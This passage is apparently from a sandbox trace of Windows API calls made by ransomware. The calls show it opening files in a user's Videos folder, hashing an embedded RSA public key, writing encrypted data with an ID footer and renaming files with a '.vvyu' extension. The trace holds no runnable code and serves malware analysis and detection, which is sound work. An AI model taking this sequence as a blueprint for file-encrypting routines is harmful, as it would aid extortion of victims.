[0198.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.744] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x16fb5, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16fb5, lpOverlapped=0x0) returned 1 [0198.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.746] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16fba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.746] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.748] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.748] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.748] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.748] CloseHandle (hObject=0x584) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0198.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0198.750] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\m0ZRF.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\m0zrf.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\m0ZRF.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\m0zrf.mkv.vvyu")) returned 1 [0198.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.752] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0198.755] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c28650, ftCreationTime.dwHighDateTime=0x1d8a585, ftLastAccessTime.dwLowDateTime=0x92e8cd0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x92e8cd0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x6fb3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P2QT4FKo.mp4", cAlternateFileName="")) returned 1 [0198.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0198.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.756] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\P2QT4FKo.mp4") returned=".mp4" [0198.757] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\P2QT4FKo.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\p2qt4fko.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.758] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=28595) returned 1 [0198.758] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.763] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6f8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.763] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.765] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.766] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x6fb3, lpOverlapped=0x0) returned 1 [0198.766] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.766] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.767] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0198.768] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.768] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.768] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.768] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.768] GetLastError () returned 0x0 [0198.768] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.768] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0198.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.768] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.768] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.769] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6fb0) returned 0x2af7168 [0198.769] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeada0 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeade8 [0198.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0198.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.770] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0198.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69c8 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae69b0 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.773] GetCurrentThreadId () returned 0x5d8 [0198.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5720 [0198.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.774] GetCurrentThreadId () returned 0x5d8 [0198.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0198.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69c8 [0198.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a28 [0198.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0198.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0198.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a40 [0198.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69e0 [0198.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69b0 [0198.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: 